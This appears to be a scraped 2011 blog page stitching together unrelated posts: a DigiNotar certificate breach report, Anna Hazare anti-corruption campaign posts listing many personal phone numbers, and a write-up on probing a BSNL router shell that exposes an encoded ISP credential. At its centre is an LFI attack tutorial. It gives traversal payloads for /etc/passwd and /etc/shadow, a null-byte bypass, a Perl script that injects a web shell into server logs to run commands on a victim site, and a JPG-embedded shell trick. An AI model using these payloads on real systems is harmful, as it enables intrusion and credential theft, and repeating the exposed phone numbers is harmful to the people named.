Latest News

Google blacklists 247 certificates. Is it related to DigiNotar hacking incident?

After yesterday's news concerning the fake certificate found in Iran that allowed an attacker to impersonate Google.com, Vasco, the parent company of certificate authority DigiNotar, released a statement explaining what happened.

As is usually the case with security incidents, the statement was light on details, but claims the certificate authority was hacked and certificates for a "number of domains" were signed by the hackers using their root certificate.

Certificate authorities are "trusted" entities who validate the certificates that allow people to create encrypted connections to web servers.

They are responsible for confirming the identity of the entity requesting a certificate so that people are unable to impersonate other people's servers.

DigiNotar discovered they were hacked on July 19th, but the intrusion began at least as early as July 10th, 2011.

They performed an audit and revoked what they thought were all of the fraudulently issued certificates, but somehow missed one that was created to impersonate Google.

Google logoMissing the issuance of a certificate for Google raises questions about the quality and depth of the audit they performed. So does the fact that, after the audit, Mikko Hypponen of F-Secure discovered several hacked web pages on DigiNotar's site dating back to May 2009.

What constitutes a "number of domains?" DigiNotar hasn't told us, but a quick look at the source code for Chromium (the open source version of Chrome OS and Chrome browser) shows that Google is blocking 247 new certificates.

Were these all issued by DigiNotar? It is difficult to tell.

However, considering only 10 were blocked previously, this is a strong indication that these additional blacklisted certificates were most likely part of this incident.

We can only speculate as to which other domains may have been targeted by the hackers, but it's not a stretch to imagine someone who wished to spy on Google traffic might also target services like Facebook, Microsoft, Yahoo and Skype.

TrustDigiNotar's ability to keep such a large incident secret for so long demonstrates that our trust in certificate authorities is misplaced.

To rely on certificate revocation to protect internet users is irresponsible, as most browsers and operating systems do a less than adequate job of honoring these lists.

DigiNotar has published an article in Dutch explaining that 99.99% of browser warnings concerning its certificates can be ignored.

This is terrible advice. While it will be difficult for DigiNotar customers to replace their certificates with new ones, this is the only solution.

If DigiNotar published the list of domains their certificate fraudulently signed this would be easier.

The existing certificate system may not be ideal, but certificate warnings should not be ignored.

SOURCE: nakedsecurity

Step by Step guide for LFI (Local File Inclusion): The process of exploiting a website

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).
First lets take a look at a php code that is vulnerable to LFI:
PHP Code:

$page = $_GET[page];
include($page);
?>

Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.


Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.


Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):


Quote:
victim.com/index.php?page=../../../../../../../etc/passwd
If you don't know what to do with the content of etc/passwd then continue reading! :puah[1]: The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:


Quote:
username: passwd:UID:GID:full_name:directory:shell
For example:


Quote:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:

Quote:
username:x:503:100:FullName:/home/username:/bin/sh
As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).
You can also sometimes see something like this:

Quote:
username:!:503:100:FullName:/home/username:/bin/sh
The ! indicates that the encoded password is stored in the etc/security/passwd file.
Heres a couple of places that may be interesting to "visit":

Quote:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.
Just one more quick thing, its also common to find a vulnerable code like:
PHP Code:

$page = $_GET["page"];
include("$page.php");
?>

In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
victim.com/index.php?file=../../../../../../../../etc/passwd


it will retrieve:
victim.com/index.php?file=../../../../../../../../etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte (%00):


victim.com/index.php?file=../../../../../../../../etc/passwd%00


With the null byte the server will ignore everything that comes after %00.
There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin! :jeerat.gif
We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:


Quote:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log


Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".


This possibly won't work because if you go look into the log you will probably see the php code like this:


Quote:
%3C?%20passthru(\$_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = ;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = ;
}


Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!


That script will inject the code and then will ask you for a command to run on the server! You know what to do now! :secret.gif
Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!


This is a quick explanation, for a better understanding you can view the video at http://www.milw0rm.com/video/watch.php?id=57
You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom download http://software.security-shell.com/i...e=edjpgcom.zipprogram (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!


After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:


Quote:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:


Quote:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.
In your browser type this (again, the nr of ../ may vary):


Quote:
victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):


Quote:
victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!

SOURCE: PINOY SECURITY

Human Chain - To Support Anna Hazare Fight Against Corruption

Time

Wednesday, August 24 · 11:00am - 2:00pm


Location

Outer Ring Road, Bangalore


For more info on this EVENT visit @ http://www.facebook.com/event.php?eid=200687539990682

Created By

Uppisatish Ag, Mohammed Saad Manna, Lomesh K Gururaj


More Info

To Create Awareness about JanLokpal.


Details as below:

Meeting points Name Ph. No.
ITPL Vijay 9945945674
Vikash 9986039986

Vaidehi Hospital Mahesh 9742279907
Yogesh 9663870352

SAP Labs Saket 9535194606
Nandhu 9845283500
Santosh 9591758503

CMR Aravind 9986294141

Kundanahalli Kaushik 9886876974
Sandeep 9036055688

Innovative Muliplex Bikas 9731044944
Muthu Krishna 9900269069
Chandrapaul 9900589799

J P Morgan Prasanna 9980303286

Cisco Fakhru 9243190888
Prashant 9008835000

Eco Space Chetan 9945698856
Mahesh 9880846162
Shishir 9036717562
Sree Harsha 9886632406

Sarjapura Jn Kamesh 9742001080
Veerendra 9902033221

Eco Space Amith 9620621716
Swapnil 9880631193

Cessana Arvind 9986294141
Ravi 9535475952

South Indian SuperStar Rajinikanth supports Anna Hazare

Actor Rajinikanth has pledged his support for Anna Hazare’s movement for the Jan Lokpal bill.

In an email sent to India Against Corruption on Tuesday, the Tamil superstar said he was happy that an able and dedicated leader like Anna Hazare is leading the fight against corruption.

“There can be no doubt that corruption is a dreaded disease that needs to be weeded from the Indian society. I am very happy that we have an able and dedicated leader in Anna Hazare to lead us in the fight against corruption. I wholeheartedly support the India Against Corruption movement in their campaign to get the Jan Lokpal bill legislated in the parliament”, the actor said.

Click here to read more on TOI.

Fasting for Anna, barefoot farmer pulls cart 400 km to Mumbai

For the Centre’s crisis managers who have been writing off Anna Hazare’s anti-graft movement as an uprising of the city-bred middle-class, here’s refreshing news: rural India is standing by the corruption crusader and is ready to die for him.

A 32-year-old farmer, who has been fasting for seven days along with Anna, has shown the grit to travel barefoot from Anna’s village all the way to Mumbai, with a cart in tow.

Vijay Balaso Jadhav, of Sangli district, started from Ralegan Siddhi on August 17 and reached the city on Sunday evening. He has covered a distance of around 400 km to express solidarity with the 74-year-old Gandhian.

Click here to read more on NDTV.

How to Support Anna Hazare? How to Participate? Support the protest at http://peoplespeak.in

The movement of people against corruption originated in India, and has now attained a global dimension.

This struggle touches certain prime truths and awakens the conscience of the people

Rulers and political managers continue to be stubborn only because the movement remains within individuals' hearts - fragmented and uncoordinated.

PeopleSpeak.in aims to coordinate and stimulate this movement.

Support the protest at http://peoplespeak.in/ to be a part of the movement.

How-to-Support-Anna-Hazare-How-to-Participate-Support-the-protest-at-peoplespeak

Jan Lokpal Bill- A Detailed Analysis: Download Powerpoint Presentation on Jan Lokpal Bill

Jan-Lokpal-Bill-A-Detailed-Analysis-Download-Powerpoint-Presentation-on-Jan-Lokpal-Bill-India-Fight-against-corruption-goes-global-Eighth-day-of-Anna-Hazare-fast-Janlokpal-bill
Downloads

Unable to download? Please send email to info@indiaagainstcorruption.org

Government Lokpal Bill 2011

Lokpal Bill (IAC Draft)

Pamphlet (Hindi) (English)

Jan Lokpal Bill- A Detailed Analysis (English)

Jan Lokpal Bill- A Detailed Analysis (Hindi)

Powerpoint Presentation on Jan Lokpal Bill (Hindi)(English) (Tamil)

Jan Lokpal VS Govt. Lokpal

Download Flags

English

Hindi

Tamil

Publicity Material

Unable to download? Please send email to info@indiaagainstcorruption.org

Pamphlet (Hindi)  (English)

Jan Lokpal Bill- A Detailed Analysis (English)

Jan Lokpal Bill- A Detailed Analysis (Hindi)

Powerpoint Presentation on Jan Lokpal Bill (Hindi)  (English)  (Tamil)

Government Lokpal Bill Vs Jan Lokpal Bill: Comparative Chart
(
Enlish Version)  (Hindi Version)  (Tamil Version)

Jan Lokpal Vs Govt's Lokpal (English)

India’s Fight against corruption goes global: Eighth day of Anna Hazare’s fast

It was the seventh day of Anna Hazare’s fast and as support from across the country kept growing, global support grew as NRI’s from all over the world demanded the Jan Lokpal bill in strong numbers.

The call for peaceful protests outside the houses of MPs by Team Anna got responses in all parts of the country. Supporters of India Against Corruption sat on dharna outside PM Manmohan Singh’s house with flowers, to insist for a strong Lokpal Bill. All the protesters were detained by the police.

Supporters of the Jan Lokpal bill also protested outside the houses of Sheila Dikshit, Pranab Mukherjee and Kapil Sibal but were detained by police and taken away immediately. A throng of people also protested outside LK Advani’s house.

Moreover, supporters also protested outside their MPs’ houses all across the nation. After day long protests outside their MPs’ house in Nagpur and Ujjain, protestors in Indore convinced MP Sumitra Mahajan to come out in support of the Jan Lokpal Bill.

After the PM reiterated on record that they are ready to talk and reach a compromise on the Lokpal bill, nobody has come forward from the government’s side to talk. On the same issue, Arvind Kejrival expressed from the stage at the Ramlila grounds that Team Anna is ready for talks and that whatever discussion has to happen should be done on stage at the Ramlila grounds for the whole nation to see and witness.

India-Fight-against-corruption-goes-global-Eighth-day-of-Anna-Hazare-fast-Janlokpal-bill

With Day 8 of Anna’s fast approaching he has already lost 5 kgs weight.

Support for the Jan Lok Pal Bill was expressed by celebrities who came to the Ramlila grounds.

Kailash Kher encouraged the crowds at Ramlila by singing and gave his voice in the fight against corruption.

Kabir and Pooja Bedi also came out in support of Anna and the Jan Lokpal Bill.

Medha Patkar who had been relentlessly addressing the crowds at Azad Maidan, Mumbai, addressed the crowds at Ramlila.

Jaspal Bhatti, also made his presence felt at the Ramlila grounds to give support to the movement.

Shailesh Gandhi, Information Commissioner, Raja Bundela, Sagguru Jaggi Vasudev, and Asif Mohammad Khan (MLA of Okhla Constituency ) also supported the movement and were present on stage at the Ramlila Grounds.

Anna Hazare at Ramlila Ground & Nation Joins Him

Anna Hazare at Ramlila Ground & Nation Joins Him...


WHERE ARE YOU ??


Arvind Kejriwal and Prashant Bhushan in response to questions about the points of negotiation in the Jan Lokpal bill said that they are not approaching the issue as negotiable points and non negotiable points. The bill must be strong and tackle corruption effectively and that is a non negotiable. On speculation about cracks within the team demanding a Jan Lokpal bill made it clear that this is all speculation and canards spread with little or no effect. Justice Hegde and the rest of the drafting committee of team Anna has been in touch and are taking each others viewpoints in order to make sure the bill is effective and acceptable to all.


Support continues to pour in from organizations and individuals from Delhi and the nation over.

  • The All Assam Students Union extended their support as they joined the campaign for the Jan Lokpal Bill. Contact Gautam – 9435548496
  • The students of IIT Guwahati joined the demand for a Jan Lokpal Bill extending their support to Anna. Contact Sayak Bhattacharya 9864840081
  • Mumbai fasted with Anna as for the first time in history the legendary Mumbai dubbawalas did not deliver lunch. This is the first time in 120 years that these tireless tiffin carriers did not carry tiffins. 5000 of them gathered at Azad Maidaan demanding the Jan Lokpal Bill.There was also a rally in support of Anna Hazare in Thane West.
  • People in Jamshedpur are on an indefinite fast demanding the introduction of the Jan Lokpal Bill. There is also a signature campaign in Jamshedpur for the cause Contact Arti Bajpeyi Dubey 9993503232, Harish Khutiar (Jaishpur) – 94241 82442
  • The Indian Ex servicemen Movement (IESM) joined the demand for a Jan Lokpal Bill as they joined the call given by a former soldier of the Indian army – Anna Hazare. Contact Bill Maj Gen Satbir Vice Chairman 9312404269, Cmdr. Vibhuti – 986810277
  • In Babarpur, Auraiya(UP) over 350 people are sitting on dharna demanding the introduction of the Jan Lokpal Bill. Contact 9045498201
  • There was a flower rally from Rajghat to Ramlila ground in support of Anna Hazare’s demand for a Jan Lokpal Bill. Contact – Abhimanyu 9873917110 and Arunima 9560786279
  • A candle march asking for a Jan Lokpal Bill and supporting Anna Hazare was held in Dimapur, Nagaland.
  • A candle march asking for a Jan Lokpal Bill and supporting Anna Hazare was held in in Dharmanagar in the state of Tripura as well. Support continues to swell in the North Eastern states.
  • There were rallies for a Jan Lokpal Bill and in support of Anna in Jammu. The rally was from Central Park to Gol market. Contact Amer 9796876680
  • There was a gathering of over a thousand non resident Indians at the Indian Consulate at Angelo Rosse Park in San Fransisco – USA.
  • There will be a march in support of Anna and his demand for a Jan Lokpal bill in Connaught Place on the 20th of August 2011. Assembly point – K Block near Nirulas outer circle at 3pm. The March will proceed to Ramlila ground at 1pm.
  • There will be a rally in Kolkata in support of Anna and the Jan Lokpal Bill. The rally will proceed from The Metro Channel near Metro cinema at 5pm on 20 Aug 2011.
  • There will be a candle march at the Indian High Commission in London between 6pm and 8pm London Time, 20 August 2011.
  • There will be a march in Los Angeles State Bank Of India pioneer boulevard on the 20th of August 2011.

Vote Here | Global Polling: India against corruption | Indian Voters' Referendum on the Lokpal Bill

Vote Here | Global Polling: India against corruption | Indian Voters' Referendum on the Lokpal Bill



VOTE HERE @ http://www.facebook.com/lokpalpoll?sk=app_176217385757369



I support Anna Hazare & Lokpal Bill Proposed by civil society. DO YOU ??


Dear Fellow Indians/NRIs,


The Intention of sending this letter & referendum form to you is - to gather the opinion & votes of the citizens of India on the Lokpal Bill. After the protests by Shri Annaa Hazare, the whole country is faced with the question - What kind of a strong Lokpal Bill should be passed which can be strong & effective in curbing the menace of Corruption? On one side, are the proposals presented by Anna Hazare, on the other side are the proposals of the government. This letter puts in front of you some of the proposals from both the sides in all fairness & without taking sides. A little time from you and your family members, will allow us to know what the ordinary Citizens of India want. We will also take the results to the Member of Parliament in your constituency, and show them what the people they represent want. We request you to kindly fill out and submit this online form (once for each voter member of your family). Kindly also forward this form / link to your friends & relatives.


Jai Hind!



1. CITIZEN'S CHARTER *All those government departments which interact directly with the public for their everyday needs, will have a Citizen's Charter. The Citizen's Charter will state which work of the Citizens will be completed in how many days, and which officer is to do that work. Two opinions have come forward from this proposal. Out of the following, which one do you agree with?
  • Anna says: If the job is not done within stipulated time, the concerned officer or department head should be fined which should be given to the complainant as compensation. Also, a case of corruption should be filed on such officer.
  • Government says: A Citizen't Charter can be made, but does not agree to fine the concerned officer for not having done his job on time.
  • I do not agree with any of the above.
  • I have no opinion on this matter

2. Who will come under the Lokpal? *Which category of officers should come under the Lokpal Bill?

  • Government says: The Lokpal should investigate corruption charges against only Group A level officers (the highest ranking officials), because it is not possible for one agency to investigate matters related to 40 Lakh Central Government Officials.
  • Anna says: The machinery of Corruption is wired & connected from top to bottom. Investigating only the top officials will not be enough. The common public has to get their work done by the lower ranking officers. Whatever system the government has to create to fight corruption should be done. Must be done.
  • I do not agree with any of the above.
  • I have no opinion on this matter

3. With the Lokpal in the Center, should there be Lokpals set up in each state at the same time? *

  • Anna says: The common man has to deal more with the state government for their everyday needs, eg. Ration, Pension, Roads, Electricity etc. Therefore, only a lokpal at the center will not be enough. Under the same Lokpal Bill, a Lokayuct should be formed in every state, which will investigate corruption of state government employees.
  • Government says: The job of controlling corruption in State Government Offices should be left to the state governments. If the state government wants, they can make their own Lokayuct. The government says that as per our constitution, the decision to create a lokayuct, is under the purview of the state governments.
  • I do not agree with any of the above.
  • I have no opinion on this matter

4. Many times, MP have been accused of taking bribes to vote or ask questions in the Parliament. Who should investigate these matters? *

  • Government Says: Such investigations can be done only by Parliamentary Committees as has been happening till now. As per the constitution, MP's have this special privilege. If such matters are investigated by the Lokpal, it will be outside the constitution.
  • Anna says: Investigations into such matters can not be left to the Member of Parliament's own committees, as there is always a possibility of favoritism. This is the reason why, despite serious allegations, no MP has gone to jail. So, the job of independent & fair investigation should be given to the Lokpal. And we should not shy away from making amendments to the constitution if necessary.
  • I do not agree with any of the above.
  • I have no opinion on this matter

5.If there is an allegation of corruption on a Judge, permission needs to be taken from the Chief Justice of the Supreme Court before initiating investigations on that judge? *

  • Government says: Correct decision on permission to investigate in matters about judges, can only be taken by judges. Giving this right to the Lokpal, will be a compromise on the independence of the judiciary. A separate bill is being brought for this. As per this new bill, a committee of 3 judges of the same court will grant permission to investigate the accused judge.
  • Anna says: Despite several matters relating to corruption in the judiciary in the past 20 years, permission to investigate has been given in only 2 cases. This very point makes it clear that judges will never give permission against their own judge "brothers". Therefore, the authority to give permission to investigate judges should be given to a 7 member bench of the Lokpal which will be fair and independent.
  • I do not agree with any of the above.
  • I have no opinion on this matter

6.If the Prime Minister is accused of corruption, the CBI is the investigative authority today.*

  • Government says: Considering the post of the prime minister, this job should not be given to the lokpal. Therefore, this work should remain with the CBI. If there are thousands of complaints against the Prime Minister, it will become difficult for him to work.
  • Anna says: The CBI works directly under the Prime Minister's control. So how can the CBI Investigate its own boss? A system can easily be put in place to curb petty & baseless allegations.
  • I do not agree with any of the above.
  • I have no opinion on this matter

7. If an official is found guilty during investigation, who should have the power to dismiss the official? *

  • Government says: The power to dismiss an official found guilty of corruption should be with the concerned minister of that department. As per the government, if the power to dismiss a corrupt official is given to the Lokpal, the officials will stop obeying orders of the ministers.
  • Anna says: Usually, in the corruption case of an official, the concerned minister is also involved. It has been found that instead of punishing the corrupt, ministers often give them lucrative postings. Therefore, they can not take a correct decision on guilty officers. The power to dismiss a corrupt official should be with the Lokpal. The minister will still have the power on transfers, postings, promotions of officials and so the officials will obey his orders.
  • I do not agree with any of the above.
  • I have no opinion on this matter

8. What should the Member of Parliament of your constituency do about the Lokpal Bill? *

  • He should vote on the bill in parliament as per the orders of his high command of the party.
  • He should vote on the bill in parliament as per the opinion of me & the people of my constituency who he represents.
  • I do not agree with any of the above.
  • I have no opinion on this matter

9.May a representative of India Against Corruption contact you (via SMS / Phone / email) to send more news & to come out in support of Anna Hazare when needed? *

  • Yes
  • No
VOTE HERE @ http://www.facebook.com/lokpalpoll?sk=app_176217385757369

I support Anna Hazare & Lokpal Bill Proposed by civil society. DO YOU ??

clip_image001

In support of Anna Hazare, I will go to INDIA GATE & RAMLILLA MAIDAN this Saturday with all my friends. If any one of you wanna join us, give me a call on 9953926905. LETS FIGHT TOGETHER.

Please everyone pass on this one.......

The Government has put condition to get 25 crore people to support Jan LokPal.To give your support call 02261550789 (as given by Kiran Bedi) from your mobile no. Your call will disconnect after 1 or 2 ring and your no registered automatically. You will get an SMS confirming this (I got the SMS). Do it and pass to all your friends to make India corruption free. It is now or never ..!!Please post this on your wall...

AND IT'S FREE OF COST... I hv Tried it.

Summary of All scams of India : Rs. 910603234300000/-

clip_image002

See how Lokpal Bill can curb the politicians, Circulate it to create awareness

Existing System

System Proposed by civil society

No politician or senior officer ever goes to jail despite huge evidence because Anti Corruption Branch (ACB) and CBI directly come under the government. Before starting investigation or prosecution in any case, they have to take permission from the same bosses, against whom the case has to be investigated.

Lokpal at centre and Lokayukta at state level will be independent bodies. ACB and CBI will be merged into these bodies. They will have power to initiate investigations and prosecution against any officer or politician without needing anyone’s permission. Investigation should be completed within 1 year and trial to get over in next 1 year. Within two years, the corrupt should go to jail.

No corrupt officer is dismissed from the job because Central Vigilance Commission, which is supposed to dismiss corrupt officers, is only an advisory body. Whenever it advises government to dismiss any senior corrupt officer, its advice is never implemented.

Lokpal and Lokayukta will have complete powers to order dismissal of a corrupt officer. CVC and all departmental vigilance will be merged into Lokpal and state vigilance will be merged into Lokayukta.

No action is taken against corrupt judges because permission is required from the Chief Justice of India to even register an FIR against corrupt judges.

Lokpal & Lokayukta shall have powers to investigate and prosecute any judge without needing anyone’s permission.

Nowhere to go - People expose corruption but no action is taken on their complaints.

Lokpal & Lokayukta will have to enquire into and hear every complaint.

There is so much corruption within CBI and vigilance departments. Their functioning is so secret that it encourages corruption within these agencies.

All investigations in Lokpal & Lokayukta shall be transparent. After completion of investigation, all case records shall be open to public. Complaint against any staff of Lokpal & Lokayukta shall be enquired and punishment announced within two months.

Weak and corrupt people are appointed as heads of anti-corruption agencies.

Politicians will have absolutely no say in selections of Chairperson and members of Lokpal & Lokayukta. Selections will take place through a transparent and public participatory process.

Citizens face harassment in government offices. Sometimes they are forced to pay bribes. One can only complaint to senior officers. No action is taken on complaints because senior officers also get their cut.

Lokpal & Lokayukta will get public grievances resolved in time bound manner, impose a penalty of Rs 250 per day of delay to be deducted from the salary of guilty officer and award that amount as compensation to the aggrieved citizen.

Nothing in law to recover ill gotten wealth. A corrupt person can come out of jail and enjoy that money.

Loss caused to the government due to corruption will be recovered from all accused.

Small punishment for corruption- Punishment for corruption is minimum 6 months and maximum 7 years.

Enhanced punishment - The punishment would be minimum 5 years and maximum of life imprisonment.

Dear All, Please go through the details carefully & try to be part of this mission against corruption. Things to know about Anna Hazare and Lok pal Bill-:

1.Who is Anna Hazare?

An ex-army man(Unmarried). Fought 1965 Indo-Pak war.

2.What's so special about him?

He built a village Ralegaon Siddhi in Ahamad Nagar district, Maharashtra.

3.This village is a self-sustained model village. Energy is produced in the village itself from solar power, biofuel and wind mills. In 1975, it used to be a poverty clad village. Now it is one of the richest village in India. It has become a model for self-sustained, eco-friendly & harmonic village.

4. This guy, Anna Hazare was awarded Padma Bhushan and is a known figure for his social activities.

5. He is supporting a cause, the amendment of a law to curb corruption in India.

6. How that can be possible?

He is advocating for a Bill, The Lok Pal Bill (The Citizen Ombudsman Bill), that will form an autonomous authority who will make politicians (ministers), bureaucrats (IAS/IPS) accountable for their deeds.

7. It's an entirely new thing right..?

In 1972, the bill was proposed by then Law minister Mr. Shanti Bhushan. Since then it has been neglected by the politicians and some are trying to change the bill to suit their theft (corruption).

8. Oh.. He is going on a hunger strike for that whole thing of passing a Bill ! How can that be possible in such a short span of time? The first thing he is asking for is: the govt should come forward and announce that the bill is going to be passed. Next, they make a joint committee to DRAFT the LOK PAL BILL. 50% government participation and 50% public participation. Bcoz u can't trust the government entirely for making such a bill which does not suit them.

9.What will happen when this bill is passed?

A LokPal will be appointed at the centre. He will have an autonomous charge, say like the Election Commission of India. In each and every state, Lokayukta will be appointed. The job is to bring all alleged party to trial in case of corruptions within 1 year. Within 2 years, the guilty will be punished.

Desh Tere Sath Hai Anna Hazare: Song By Kailash Kher for Anna's Battle

Desh Tere Sath Hai Anna Hazare: Song By Kailash Kher for Anna's Battle


People against Corruption with Anna Hazare, Whole India steering the Ship against corruption in India, Anna Hazare buzzing consistently for the crusade and requesting the whole India for join his crusade for to pass an effective Lokpal Bill for anti-corruption










BSNL router hacking and possibility of running custom code over it

Hi all,


I am sorry I have been inactive due to my job, i actually got free this weekend and there we go, i was at home. ta home I am having BSNL connection, and for those who dont know what BSNL is, its the AT&amp;amp;amp;T of India, bad service , too much blank spots and connections which flap/drop/disconnect like there is no tomorrow. Worst, I was on my android, trying to get the latest of cyanogen nightlies . I was frustrated by the services of BSNL. Hence I decided to mess with the router itself.


BSNL router on closer inspection is manufactured by SEMIndia and distributed by ITI. It follows the tracks of using firmware of different routers (Broadcom to be specific, BCM96338 stands for Broadcom router firmware version 96338, deployed in US robotics ones and some other popular routers). mine is DNA-A211-1 , one of most popular ones in India.






and then its just configured accordingly wrt ISP. This time, I left the network part, as i do it all the time in my office with Cisco, focused more on the router and firmware itself.




Warning :
I am not responsible for getting your router trashed, getting wings and trying to kill you. try on your own risk, I am not responsible for your stupidity.




I didn't had a PC (trashed due to burnt ram), so I have to do everything on my android, so pardon for small screen area, understand my plight. T-netted into Router
(PS : screencaps of android may be a bit distorted as shootme app was not working properly over nightly #120)








the first step was to know what was into it, so typed the usual help.






lots of commands :) ran swversion to get the version and see what was this upto.
With some hunting , i came to know that "sh" command runs over my router , ran it and voila, familiar interface of busybox snaps in.






great..now thats worth something. My android has it too :)) seeing the version made me tick , it was running an older version of busybox. For those who don't know hat busybox is, its a multicall binary. Tried ls, but it didnt worked, hence tried echo *, listed everything :)






bingo..tried cat /etc/passwd and there we go again.








after that, i thought why not to check what other directories have. got into CVS and got information regarding CVS and pserver, noteworthy one is the credentials of pserver






pserver:sunila@192.168.128.19:/home/cvsroot


not much of an interest as they are of a private LAN, googled to find it was configured by Sunil A, employee at SIEMIndia. Again,opened Repository






SemIndia/Engineering/Products/ADSL2Plus/Integ_Source/targets/fs.src


maybe a private repo at SIEM. neverthless..


moved on to /etc






lots of directories here..as a rule of thumb I opened default.cfg






Generic stuff, but what caught my eye was this


&amp;amp;lt;ppp_conId1 userName="multiplay" password="bXVsdGlwbGF5"


This might come in handy (use your creativity :)) ) . But then I thought that why not to access the router from web interface. I did it.
Went to management and downloaded the backupsettings.conf file,








opened it and there we go,






I was not able to find the above credentials in it, hence I came to a conclusion that they must be somewhat of higher privilege level.
Moving on..I thought why not to try to create an arbitrary file . Tried
echo ‘rishrockz’ &amp;amp;gt;&amp;amp;gt; rdx


on every directory (I was not able to determine the file permissions as the version of busybox doesn’t has ls/stat ) Finally came to know that /var is writable. Tried creating a file there
echo ‘rishrockz’ &amp;amp;gt;&amp;amp;gt; rdx
file was created : )))))
and then
cat /var/rdx


: ))))
Congrats, you have run/done it :) )
Now I thought why not to upgrade busybox/upgrade firmware/upload scripts over the router, tried tftp


didn’t worked. Then I checked if the tftp daemon was running as a service, it was. yet somehow I was not able to run it. :(


Strange. I thought forget it (small screen keyboard and android research limitation -&amp;amp;gt; frustration) . Well.. next time I will be thinking of going to compile programs (http://people.debian.org/~debacle/cross/) and copying over them using echo (once I get a PC) , I have got some nice ideas and will be deploying them .
In the mean time, for those who are wondering what this machine has, here is the bootup log.


